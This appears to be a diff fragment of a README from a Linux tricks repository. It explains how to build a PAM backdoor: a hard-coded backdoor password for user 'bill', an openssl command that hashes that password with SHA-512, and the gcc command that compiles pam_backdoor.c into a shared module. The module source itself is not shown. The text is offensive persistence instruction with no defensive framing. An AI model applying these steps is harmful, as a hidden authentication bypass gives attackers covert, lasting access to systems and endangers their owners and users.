billchaison/Linux-Trix/README.md

 User account `bill` with backdoor password `L3t-Me-!n` is used in this example.

+Instead of storing the plaintext password in the PAM module, use a SHA-512 crypt hash.
+The hash in this example is created like this.

+`openssl passwd -6 -salt w14h38cn 'L3t-Me-!n'`

 Create a source file called `pam_backdoor.c` as follows.
 It will be compiled into `pam_backdoor.so` like this.

 `gcc -fPIC -shared -o pam_backdoor.so pam_backdoor.c -lpam`